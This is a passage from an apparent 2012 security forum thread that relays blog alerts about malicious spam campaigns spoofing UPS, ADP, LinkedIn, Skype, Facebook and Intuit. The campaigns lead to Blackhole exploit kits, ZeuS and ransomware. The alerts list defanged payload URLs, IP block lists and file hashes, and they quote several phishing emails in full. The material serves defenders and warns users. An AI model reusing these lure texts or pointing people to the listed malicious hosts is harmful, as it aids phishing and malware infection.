New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center
Please visit the UPS Billing Center to view and pay your invoice.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]minus.preciseenginewarehouse .com/links/assure_numb_engineers.php hosted on 174.140.165.112 ... To be precise, the subdomains seem malicious, the domains themselves appear to be legitimate ones where the domain account has been hacked. Blocking 174.140.165.112 would be prudent."
:mad: :mad:
AplusWebMaster
2012-10-08, 05:50
FYI...
Something evil on 5.9.188.54
- http://blog.dynamoo.com/2012/10/something-evil-on-5918854.html
7 Oct 2012 - "Here's a nasty bunch of sites being used in injection attacks, all hosted on 5.9.188.54:
nfexfkloawuqlaahsyqrxo.qlvyeviexqzrukyo.waw .pl
nqvzrpyoossmr.qlvyeviexqzrukyo.waw .pl
xfynhovgofzsqueuuprplvv.qlvyeviexqzrukyo.waw .pl
lgrfuqfwz.qlvyeviexqzrukyo.waw .pl
zlqfrypzqyubsedrzugeaf.urblvhnfxzrozzlz.waw .pl
qxggipnnfmnihkic .ru
mvuvchtcxxibeubd .ru
5.9.188.54 is a Hetzner IP address (no surprise there) suballocated to:
inetnum: 5.9.188.32 - 5.9.188.63
netname: LLC-CYBERTECH
descr: LLC "CyberTech"
country: DE ...
address: 125252 Moscow
address: RUSSIAN FEDERATION
... You might want to block the whole 5.9.188.32/27 range.. you should certainly block 5.9.188.54 if you can."
- http://centralops.net/co/DomainDossier.aspx
5.9.188.54
address: 125252 Moscow
address: RUSSIAN FEDERATION...
origin: AS24940
- http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5865 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... last time suspicious content was found was on 2012-10-07... we found 998 site(s)... that appeared to function as intermediaries for the infection of 12809 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1752 site(s)... that infected 18780 other site(s)."
:mad:
AplusWebMaster
2012-10-08, 14:11
FYI...
Skype users targeted with Ransomware and Click Fraud
- http://www.gfi.com/blog/skype-users-targeted-with-ransomware-and-click-fraud/
Oct 8, 2012 - "The infection* that’s still spreading across users of Skype has taken an interesting twist: ransomware and click fraud. Skype users tempted to follow the latest set of infection links will end up with a zipfile on their PC. Here’s an example of the rogue links still being pinged around:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/skypevirus41.jpg
Clicking the link will download a zipfile, and running the executable inside will see the infected PC making waves with network traffic that wasn’t present when we tested the last executable...
> http://www.gfi.com/blog/wp-content/uploads/2012/10/RansomWare_EncryptionScare4-300x152.jpg
After a while, a Java exploit will call down some fire from the sky (in the form of BlackHole 2.0) and the end-user will be horrified to see this:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/RansomWare_EncryptionScare1.jpg
... a typical Ransomware scare message that locks the user out of their data, encrypts the files and demands payment (via Moneypak) to the tune of $200. The IP address and geographical location is displayed in the bottom right hand corner, along with various threats related to the downloading of MP3s, illegal pornography, gambling and more besides. Ransomware is currently a big deal and not something an end-user really wants to have on their computer. Meanwhile, behind the scenes we have what looks like attempts at click fraud taking place behind the locked computer screen... in the space of 10 minutes, we recorded 2,259 transmissions(!)... to infect the computer, you’ll need to manually click the download link, open the zip and run the executable. On top of that, anybody trying to open the file who hasn’t switched off file security warnings will be told that “The publisher could not be verified, are you sure you want to run this software” so there’s plenty of chances to dodge this bullet..."
* http://www.gfi.com/blog/infection-spreads-profile-pic-messages-to-skype-users/
:mad:
AplusWebMaster
2012-10-10, 15:08
FYI...
Skype SPAM voicemail leads to Blackhole / Zeus attacks
- http://www.gfi.com/blog/skype-voicemail-spam-leads-to-blackhole-zeus-attacks/
Oct 10, 2012 - "... spam mail... claims to be a Skype Voicemail notification, for example:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/skypevoicemailscam.png
It reads as follows:
Hi there,
You have a new voicemail
Sign in to Skype to listen to the message.
If you no longer want to receive email alerts about new voicemails, unsubscribe now.
Talk soon,
The people at Skype
It looks pretty authentic, and will send curious clickers to URLs tied up in Blackhole / Zeus infections. On a related note, we’re also seeing Sprint Wireless and fake Facebook friend request spam doing much the same as the above so please be careful when wading through your inbox – there’s a fair amount of spam targeting users with exploits right now and it covers a wide range of subjects from payroll notifications and Craigslist adverts to UPS invoices and American Express payment receipts."
- http://pandalabs.pandasecurity.com/is-it-your-new-pic-profile-no-it-s-a-worm-spreading-through-skype-and-messenger/
10/10/12
___
Skype Messages Spreading DORKBOT Variants
- http://blog.trendmicro.com/trendlabs-security-intelligence/skype-messages-spreading-dorkbot-variants/
Oct 9, 2012
- http://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/
Oct 16, 2012 - "... spreading via Skype spammed messages... now reached (more than) 17,500 reported infections globally... DORKBOT is not primarily meant to steal information, but still has the capability to steal login credentials. It does this by hooking several APIs in popular web browsers. Among the sites monitored are Twitter, Facebook, Bebo, Friendster, Paypal, Netflix, and Sendspace. DORKBOT also check strings sent to monitored sites via HTTP POST, thus information in HTTP form files like passwords, usernames, and email addresses... DORKBOT downloads an updated copy of itself per day, which are typically undetected because they arrive with different packers. This is probably done to remain undetected on the infected system. With multiple dangerous routines and propagation methods well-fit into the common users’ typical online activities, DORKBOT is clearly a threat that users need to avoid and protect themselves from..."
- http://blog.spiderlabs.com/2012/10/worm-propagates-through-skype-messages.html
12 Oct 2012
___
Rampaging Squirrel + Boyband = Twitter SPAM
- http://www.gfi.com/blog/rampaging-squirrel-boyband-twitter-spam/
Oct 10, 2012 - "Yesterday I saw a news article that did a frankly amazing job of rendering the plight of a boyband member being attacked by a squirrel*, and mentioned it on Twitter. Within seconds, I was on the receiving end of some spam telling me I’d won a prize:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/1dirspam.jpg
Twitter users were spammed in groups, with the above account holding off on providing a URL to click. Instead, curious Tweeters would instead choose to visit the above account then click the URL in the profile – onedgiveaway(dot)com.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/2dirspam.jpg
“Congratulations 1D Fan! Please vote for your favourite 1D member below. To say thanks accept a free gift worth over $500
... I went for Liam Payne on the basis that he might be related to Max and ended up with the following survey page located at 1dviptickets(dot)com:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/3dirspam.jpg
... I came away with no free gift but lots of surveys (and a whole bunch of “Are you sure you want to go” style pop-ups while trying to leave the page) – nobody has “won” anything, it’s just some random fire-and-forget spam. At time of writing, the spam account is still active and blindfiring more messages to random Twitter users..."
* http://www.wandsworthguardian.co.uk/news/9972709.One_Direction_star_viciously_attacked_by_Battersea_Park_squirrel/
___
Fake job offers - union-trans .com employment scam
- http://blog.dynamoo.com/2012/10/union-transcom-employment-scam.html
10 Oct 2012 - "This fake job offer is for a "forwarding agent"... basically it's a parcel reshipping scam where goods bought with stolen credit cards are sent to the "agent's" home address, and then the "agent" forwards to stolen goods on to Eastern Europe or China or whatever. Of course, when the police catch on it's the "agent" who is in deep, deep trouble... There appear to be several scam domains in this same email. union-trans .com is hosted on 180.178.32.238 (Simcentric, Hong Kong)... Originating IP is 183.134.113.165 (Zhejiang Telecom, Ningbo, China)... Generally speaking, unsolicited job offers from out-of-the-way places are bad news and should be avoided."
Sprint SPAM / 1.starkresidential .net
- http://blog.dynamoo.com/2012/10/sprint-spam-1starkresidentialnet.html
9 Oct 2012 - "This fake Sprint spam leads to malware on 1.starkresidential .net...
The malicious payload is at [donotclick]1.starkresidential .net/links/assure_numb_engineers.php hosted on 74.207.233.58 (Linode, US)... appear to be malicious subdomains of legitimate hacked domains. If you can, you should block traffic to 74.207.233.58 to stop other malicious sites on the same server from being a problem."
"Biweekly payroll" SPAM / editdvsyourself .net
- http://blog.dynamoo.com/2012/10/biweekly-payroll-spam-editdvsyourselfnet.html
9 Oct 2012 - "This fake payroll spam leads to malware on editdvsyourself .net...
The malicious payload is on [donotclick]editdvsyourself .net/detects/beeweek_status-check.php, hosted on the familiar IP address of 183.81.133.121 (Vodafone, Fiji)..."
___
Facebook Scam SPAM
- https://isc.sans.edu/diary.html?storyid=14281
Last Updated: 2012-10-10 14:32:26 UTC - "... reports of Facebook Scam Spam... TinyURL has since taken down the redirect and classified it as Spam. However, the image (and others like it) still propagate by FB users clicking on the link. This type of scam is used mostly -without- the permission of the vendor noted, in this case Costco*. The idea is to entice the user to click so they get -redirected- to a site where the business model depends on traffic volume...
> https://isc.sans.edu/diaryimages/Diary14281-Costco-Scam-Spam.png
If you are a Facebook user, then please be wary of any offers that entice you to "click" to receive. It's a really bad practice. The holiday shopping season is beginning and these vectors are going to be heavily used by the scammers in the coming months."
:fear: :fear: :mad:
AplusWebMaster
2012-10-10, 21:00
FYI...
Malicious Presidential SPAM campaign has started...
- http://community.websense.com/blogs/securitylabs/archive/2012/10/10/breaking-news-the-malicious-usa-presidential-spam-campaign-started.aspx
10 Oct 2012 - "... Websense... has detected a spam campaign that tries to exploit recipients' interest in the current presidential campaign in the US. Specifically, we have detected thousands of emails with this kind of content:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/6371.ssshot001.png_2D00_550x0.png
... we are seeing an increasing number of spam campaigns with malicious links that lead to BlackHole exploit pages. This is also what happens with this campaign. If the recipient clicks on one of the links in the email, it starts a redirection flow which leads to URLs that host BlackHole exploit code. We simulated the recipient's experience with the support of the Fiddler tool, as shown below:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/4530.sshot002.png
The pattern used strongly resembles the pattern used in other malicious, BlackHole-based spam campaigns, so we decided to investigate using a little set of samples from this campaign. The samples were chosen based on thousands of emails.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1106.sshot004.PNG
The links found in the spam emails usually has this kind of content:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/2438.sshot005.PNG
The purpose of this flow as usual is to install malicious files. In this malicious SPAM campaign, we noticed low detected PDF, JAR and EXE files (used to compromise the victim systems). During our simulated user exeperience we have found the following involved files:
PDF - MD5: 69e51d3794250e3f1478404a72c7a309
JAR file - MD5: 03373056bb050c65c41196d3f2d68077
about.exe - MD5: 9223b428b28c7b8033edbb588968eaea ...
Each URL... contains a redirection payload that leads the victim to a malicious website that hosts BlackHole exploit kit 2.0 obfuscated code..."
- http://blog.trendmicro.com/trendlabs-security-intelligence/obama-vs-romney-political-online-threats/
Update as of Oct 11, 2012 - "... email is supposedly from CNN and contains news stories about the election:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/cnn-spam.png
... instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit..."
- http://blog.trendmicro.com/trendlabs-security-intelligence/obama-vs-romney-political-online-threats/
Oct 10, 2012 - "... This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices."
:mad:
AplusWebMaster
2012-10-11, 23:01
FYI... Multiple entries:
LinkedIn SPAM / inklingads .biz
- http://blog.dynamoo.com/2012/10/linkedin-spam-inklingadsbiz.html
11 Oct 2012 - "The bad guys are very busy today with all sorts of spam campaigns, including lots of messages as below pointing to malware on
From: LinkedIn Notification [mailto:hewedngq6@omahahen.org]
Sent: 11 October 2012 15:59
Subject: LinkedIn Reminder
Importance: High
LinkedIn
REMINDERS
Invite events:
From Thaddeus Sosa ( Your servant)
PENDING EVENTS
There are a total of 3 messages awaiting your action. See your InBox immediately...
The malicious payload is on [donotclick]inklingads.biz/detects/invite-request_checking.php hosted on 183.81.133.121 (Vodafone, Fiji)"
___
ADP SPAM / 198.143.159.108
- http://blog.dynamoo.com/2012/10/adp-spam-198143159108.html
12 Oct 2012 - "Yet -more- fake ADP spam (there has been a lot over the past 24 hours) is being pushed out. This time there's a malicious payload at [donotclick]198.143.159.108 /links/rules_familiar-occurred.php (Singlehop, US).
Avoid."
___
ADP SPAM / 4.wapin .in and 173.224.209.165:
- http://blog.dynamoo.com/2012/10/adp-spam-4wapinin.html
11 Oct 2012 - "This fake ADP spam leads to malware on 4.wapin .in:
From: ADP.Security [mailto:5BC4F06B@act4kids.net]
Sent: 11 October 2012 14:22
Subject: ADP: Urgent Notification
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
----
Digital Certificate About to Expire...
The malicious payload is on [donotclick]4.wapin .in/links/assure_numb_engineers.php hosted on 198.136.53.39 (Comforthost, US).
Another variant of this goes to [donotclick]173.224.209.165/links/assure_numb_engineers.php (Psychz Networks, US)"
___
ADP SPAM / 108.61.57.66
- http://blog.dynamoo.com/2012/10/adp-spam-108615766.html
11 Oct 2012 - "There's masses of ADP-themed spam today. Here is another one:
Date: Thu, 11 Oct 2012 14:53:17 -0200
From: "ADP.Message" [986E3877@dixys.com]
Subject: ADP Generated Message
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
---------------------------------------------------------------------
Digital Certificate About to Expire
---------------------------------------------------------------------
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 3
Expiration date: Oct 14 23:59:59 GMT-03:59 2012
---------------------------------------------------------------------
Renewing Your Digital Certificate ...
In this case the malicious payload is at [donotclick]108.61.57.66 /links/assure_numb_ engineers .php hosted by Choopa LLC in the US. The IP is probably worth blocking to be on the safe side."
___
Blackhole sites to block ...
- http://blog.dynamoo.com/2012/10/blackhole-sites-to-block-111012.html
11 Oct 2012 - "A bunch of sites are active today with the Blackhole exploit kit.. here are the ones seen so far:
183.81.133.121
198.136.53.39
173.255.223.77
64.247.188.141
inklingads .biz
The delivery mechanisms are fake LinkedIn and eFax messages. Block those IPs if you can.
___
"Copies of Policies" SPAM / windowsmobilever .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam.html
11 Oct 2012 - "This slightly odd spam leads to malware on windowsmobilever .ru:
Date: Thu, 11 Oct 2012 10:55:37 -0500
From: "Amazon.com" [account-update@amazon.com]
Subject: RE: DONNIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DONNIE LOCKWOOD,
==========
Date: Thu, 11 Oct 2012 12:26:25 -0300
From: accounting@[redacted]
Subject: RE: MARGURITE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARGURITE Moss
Anyone who clicks on the link will end up on an exploit kit at [donotclick]windowsmobilever .ru:8080/forum/links/column.php - hosted on:
68.67.42.41 (Fibrenoire , Canada)
203.80.16.81 (MYREN, Malaysia)
These two IPs are currently involved in several malicious spam runs and should be blocked if you can."
___
eFax SPAM / 173.255.223.77 and chase .swf
- http://blog.dynamoo.com/2012/10/efax-spam-17325522377-and-chaseswf.html
11 Oct 2012 - "Two different eFax spam runs seem to be going on at the same time:
' From: eFax Corporate [mailto:05EBD8C@poshportraits.com]
Sent: 11 October 2012 12:58
Subject: eFax notification
You have received a 50 page(-s) fax...'
' From: eFax.Corporate [mailto:2C4C2348@aieservices.com.au]
Sent: 11 October 2012 12:51
Subject: eFax: You have received new fax
You have received a 34 page(-s) fax...'
One leads to a malicious landing page at [donotclick]173.255.223.77 /links/assure_numb_engineers.php hosted by Linode in the US.
The other one is a bit odder, referring to a file called chase.swf on a hacked site. VT analysis shows just 1/44* which is -not- good..."
* https://www.virustotal.com/file/5db60c98687a6355c178ebb744beceacc2c49b8f666ac62ff338154402597784/analysis/
File name: chase.swf-QrUTmm
Detection ratio: 1/40
Analysis date: 2012-10-11 13:04:39 UTC...
:mad::mad:
AplusWebMaster
2012-10-15, 14:03
FYI...
Vodafone SPAM - emails serve malware
- http://blog.webroot.com/2012/10/15/vodafone-europe-your-account-balance-themed-emails-serve-malware/
Oct 15, 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Vodafone Europe, in an attempt to trick their customers into executing the malicious file attachment found in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/vodafone_europe_spam_email_malware.png
Detection rate: Vodafone_Account_Balance.pdf.exe – MD5: 8601ece8b0c79ec3d4396f07319bbff1 * ... Trojan-Ransom.Win32.PornoAsset.xen; Worm:Win32/Gamarue.F..."
* https://www.virustotal.com/file/2d625be6491b44c052a4a97fd7c955cb7694021217e977ed40bbfd333a9c470e/analysis/1349008562/
File name: Your_Friend_New_photos-updates.jpeg.exe
Detection ratio: 36/43
Analysis date: 2012-09-30 15:01:54 UTC
___
Fake UPS emails - client-side exploits and malware
- http://blog.webroot.com/2012/10/15/cybercriminals-impersonate-ups-serve-client-side-exploits-and-malware/
Oct 15, 2012 - "... cybercriminals spamvertised millions of email addresses, impersonating UPS, in an attempt to trick end users into viewing the malicious .html attachment. Upon viewing, the file loads a tiny iFrame attempting to serve client-side exploit served by the latest version of the BlackHole Exploit kit, which ultimately drops malware on the affected host.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/ups_spam_email_exploits_malware_black_hole_exploit_kit.png
... Sample detection rate for a malicious .html file found in the spamvertised emails: UPS_N21489880.htm – MD5: 38a2a54d6e7391d7cd00b50ed76b9cfb * ... Trojan.Iframe.BCK; Trojan-Downloader.JS.Iframe.dbh
* https://www.virustotal.com/file/37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453/analysis/
File name: java.jar
Detection ratio: 26/43
Analysis date: 2012-10-15
... currently responding to the following IPs – 84.22.100.108; 190.10.14.196; 203.80.16.81; 61.17.76.12; 213.135.42.98
... Related malicious domains part of the campaign’s infrastructure:
rumyniaonline .ru – 84.22.100.108
denegnashete .ru – 84.22.100.108
dimabilanch .ru – 84.22.100.108
ioponeslal .ru – 84.22.100.108
moskowpulkavo .ru – 84.22.100.108
omahabeachs .ru – 84.22.100.108
uzoshkins .ru – 84.22.100.108
sectantes-x .ru – 84.22.100.108
... Name servers part of the campaign’s infrastructure:
ns1.denegnashete .ru – 62.76.190.50
ns2.denegnashete .ru – 87.120.41.155
ns3.denegnashete .ru – 132.248.49.112
ns4.denegnashete .ru – 91.194.122.8
ns5.denegnashete .ru – 62.76.188.246
ns6.denegnashete .ru – 178.63.51.54 ..."
___
Rogue Bad Piggies ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-developers-released-rogue-bad-piggies-versions/
Oct 15, 2012 - "... Right after reports of malicious Bad Piggies on Google Chrome webstore circulated, we found that certain developers also released their own, albeit rogue versions of the said gaming app. On the heels of Bad Piggies‘ launch last month, we saw rogue versions of the game on specific web pages hosted on Russian domains. However, these versions are -not- affiliated at all with the game. Based on our analysis, these apps are verified as malicious, specifically premium service abusers, which send SMS messages without user consent and leaves users with unnecessary charges... During our research, we used the keyword “Bad Piggies” and encountered 48 Russian domains. Among these sites is piggies-{BLOCKED}d .ru, which appears as an app download page.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/roguebadpiggies_website.jpg
... site offers the said app on different platforms. Instead of the actual Bad Piggies app, users instead download a malicious .APK file detected as ANDROIDOS_FAKEINST.A. Once installed, it creates a shortcut on the device’s homepage and sends SMS messages to specific numbers. As mentioned, these messages are sent without user consent and may cost users to pay extra for something they didn’t authorize... ANDROIDOS_FAKEINST.A has the ability to obfuscate its codes via inserting junk codes and encrypting the strings and decrypting it upon execution. It also replaces all class/method/field name with meaningless strings thus making analysis difficult... Bad Piggies is a spinoff of the highly popular Angry Bird franchise and its release enjoyed good coverage from popular media. Such is also the case with the malicious Instagram and Angry Birds Space... To victimize as many users as possible, shady developers and certain crooks created rogue versions to take advantage of these apps’ popularity and their media exposure. Russian domains also appear to be the favorite among rogue apps developers. Beginning this year up to July, we already blocked more than 6,000 mobile app pages hosted on .RU domains... an increase compared to last year’s 2,946 blocked sites. To lead users to these sites, the people behind these apps spread the links via forum, blog posts or email. To prevent downloading a fake (or worse, a malware disguised as an app) users should stick to legitimate app stores like Google Play..."
___
eBay phishers update branding...
- http://www.gfi.com/blog/ebay-phishers-update-their-branding/
Oct 15, 2012 - "... be aware that not only have eBay updated their logo for the first time since 1995, some scammers have also been quick out of the blocks to rejig their phishing scams and paste in the new logo accordingly. Here’s a scammer who hasn’t quite grasped the concept of “You’re horribly outdated” yet:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/fakebay_new2.jpg
... here’s a scammer who clearly keeps up with the news and probably owns a gold plated yacht and maybe a Unicorn as a result:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/fakebay_new1.jpg
... It probably won’t be long before most (if not all) phishers start using the new logo, but for the time being at least some phish attempts will be a little easier to spot for the average end-user. Of course, avid eBay users can also visit their Security Center* and keep up to date with all the latest shenanigans."
* http://pages.ebay.com/securitycenter/index.html ..."
:fear::fear: :mad:
AplusWebMaster
2012-10-16, 15:28
FYI...
Wire Transfer SPAM / hotsecrete .net
- http://blog.dynamoo.com/2012/10/wire-transfer-spam-hotsecretenet.html
16 Oct 2012 - "This fake wire transfer spam leads to malware on hotsecrete .net:
From: Federal Information System [mailto:highjackingucaf10@atainvest.com]
Sent: 16 October 2012 15:59
Subject: Wire Transfer accepted
We have successfully done the following transfer:
________________________________________
Item #: 35043728
Amount: $16,861.99
To: Anthony Glover
Fee: 29.00
Send on Date: 10/16/2012
Service: Domestic Wire
________________________________________
If there is a problem with processing your request we would report to you both by email and on the Manage Accounts tab. You can always check your transfer status via this link Sincerely,
Federal Reserve Bank Automate Notify System
*********************************************
Email Preferences
This is a service warning from Federal Reserve Bank. Please note that you may receive notification note in accordance with your service agreements, whether or not you elect to receive promotional email.
=============================================
Federal Reserve Bank Email, 8th Floor, 170 Seashore Tryon, Ave., Charlotte, TX 89936-0001 Federal Reserve Bank.
The malicious payload is found at [donotclick]hotsecrete .net/detects/exclude-offices_details_warm.php hosted on 183.81.133.121 (Vodafone, Fiji) which is a well-known malicious IP address that you should block."
___
LinkedIn SPAM / 74.91.112.86
- http://blog.dynamoo.com/2012/10/linkedin-spam-749111286.html
16 Oct 2012 - "This fake LinkedIn spam leads to malware on 74.91.112.86:
From: LinkedIn.Invitations [mailto:1F31A2F6B@delraybeachhomesales.com]
Sent: 16 October 2012 13:50
To: [redacted]
Subject: New invitation is waiting for your response
Hi [redacted],
David sent you an invitation to connect 13 days ago. How would you like to respond?
Accept Ignore Privately
Hilton Suarez
Precision Castparts (Distributor Sales Manager EMEA)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]74.91.112.86 /links/assure_numb_engineers.php hosted by Nuclearfallout Enterprises in the US (no surprises there)."
___
Facebook SPAM / o.anygutterkings .com
- http://blog.dynamoo.com/2012/10/facebook-spam-oanygutterkingscom.html
15 Oct 2012 - "This fake Facebook spam leads to malware on o.anygutterkings .com:
Date: Mon, 15 Oct 2012 20:02:21 +0200
From: "FB Account"
Subject: Facebook account
facebook
Hi [redacted],
You have blocked your Facebook account. You can reactivate your account whenever you wish by logging into Facebook with your former login email address and password. Subsequently you will be able to take advantage of the site as before
Kind regards,
The Facebook Team
Sign in to Facebook and start connecting ...
Please use the link below to resume your account ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
Other subjects are: "Account blocked" and "Account activated"
The payload is at [donotclick]o.anygutterkings .com/links/assure_numb_engineers.php hosted on 198.136.53.38 (Comforthost, US)..."
- http://www.gfi.com/blog/this-spam-gives-recipients-a-second-chance/
Oct 16, 2012 - "... another Blackhole-Zeus-related threat... ignore and delete this Facebook spam..."
> http://www.gfi.com/blog/wp-content/uploads/2012/10/FB_1015.png
___
Intuit SPAM / navisiteseparation .net
- http://blog.dynamoo.com/2012/10/intuit-spam-navisiteseparationnet.html
15 Oct 2012 - "This fake Intuit spam leads to malware on navisiteseparation .net:
Date: Mon, 15 Oct 2012 15:20:13 -0300
From: "Intuit GoPayment" [crouppywo4@deltamar.net]
Subject: Welcome - you're accepted for Intuit GoPayment
Congratulations!
GoPayment Merchant by Intuit request for ONTIMEE ADMINISTRATION, Inc. has been ratified.
GoPayment
Account Number: XXXXXXXXXXXXXX55
Email Address: [redacted]
PLEASE NOTE : Associated charges for this service may be applied now.
Next step: View or confirm your Access ID
This is {LET:User ID lets you:
Review your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is we found an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify Access ID
Get started:
Step 1: If you have not still, download the Intuit software.
Step 2: Launch the Intuit application and sign in with the Access ID (your email address) and Password you setup.
Easy Manage Your Intuit GoPayment Account
The GoPayment Merchant Service by Intuit Center is the web site where you can learn more about GoPayment features, customize your sales receipt and add GoPayment users. You can also view transactions, deposits and fees. Visit url and sign in with your GoPayment AccesID (your email address) and Password.
For more information on how to start using GoPayment Merchant by Intuit, including tutorials, FAQs and other resources, visit the Merchant Service Center at service link.
Please don't reply to this message. auto informer system unable to accept incoming messages.
System Terms & Agreements � 2008-2012 Intuit, INC. All rights reserved.
... Sample subjects:
Congrats - you're accepted for Intuit GoPayment Merchant
Congratulations - you're approved for Intuit Merchant
Congrats - you're approved for GoPayment Merchant
Welcome - you're accepted for Intuit GoPayment
The malicious payload is at [donotclick]navisiteseparation .net/detects/processing-details_requested.php hosted on 183.81.133.121 (Vodafone, Fiji). The good news is that the domain has been suspended by the registrar, but that IP address has been used many times recently and should be blocked if you can."
___
Copies of Policies SPAM / linkrdin .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam-linkrdinru.html
15 Oct 2012 - "Another "Copies of Policies" spam, this time leading to malware on linkrdin .ru:
From: [support@victimdomain.com]
Date: 15 October 2012 07:15
Subject: RE: SANTOS - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
The malicious payload is on [donotclick]linkrdin .ru:8080/forum/links/column.php ... hosted on the same IPs as this spam:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (UAB Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia) ..."
:mad::mad: :fear:
AplusWebMaster
2012-10-17, 14:58
FYI...
Fake American Airlines emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/17/american-airlines-themed-emails-lead-to-the-black-hole-exploit-kit/
Oct 17, 2012 - "... cybercriminals launched yet another massive spam campaign, this time impersonating American Airlines in an attempt to trick its customers into clicking on a malicious link found in the mail. Upon clicking on the link, users are exposed to the client-side exploits served by the BlackHole Exploit Kit v2.0...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/american_airlines_spam_email_exploits_malware_black_hole_exploit_kit.png
Spamvertised compromised URL: hxxp ://malorita-hotel .by/wp-config.htm
Detection rate for a sample Java script redirection: American_Airlines.html – MD5: 7b23a4c26b031bef76acff28163a39c5* ...JS/Exploit-Blacole.gc; JS:Blacole-CF [Expl]
Sample client-side exploits serving URL: hxxp ://omahabeachs .ru:8080/forum/links/column.php
We’ve already seen the same malicious email used in the previously profiled “Cybercriminals impersonate -UPS-, serve client-side exploits and malware” campaign, clearly indicating that these campaigns are launched by the same cybercriminal/gang of cybercriminals..."
* https://www.virustotal.com/file/68d4efe09c049d1a41ffe43077658ecf6472ec10aa10354986c8fe45ca6bfb48/analysis/1349016199/
File name: American_Airlines.html
Detection ratio: 9/42
Analysis date: 2012-09-30
___
Fake Amazon emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/16/cybercriminals-spamvertise-amazon-shipping-confirmation-themed-emails-serve-client-side-exploits-and-malware/
Oct 16, 2012 - "... cybercriminals have been spamvertising millions of emails impersonating Amazon.com in an attempt to trick customers into thinking that they’ve received a Shipping Confirmation for a Vizio XVT3D04, HD 40-Inch 720p 100 Hz Cinema 3D LED-LCD HDTV FullHD and Four Pairs of 3D Glasses. Once users click on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the latest version of the Black Hole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit.png
... Second screenshot of the spamvertised email impersonating Amazon.com Inc:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit_01.png
Once users click on the links found in the malicious email, they’re presented with the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit_02.png
Sample subjects used in the spamvertised emails:
Re: HD TV Waiting on delivery Few hours ago;
Your HDTV Delivered Now;
Re: HDTV Processed Yesterday;
Re: Order Processed Today;
Your Order Approved Few hours ago ...
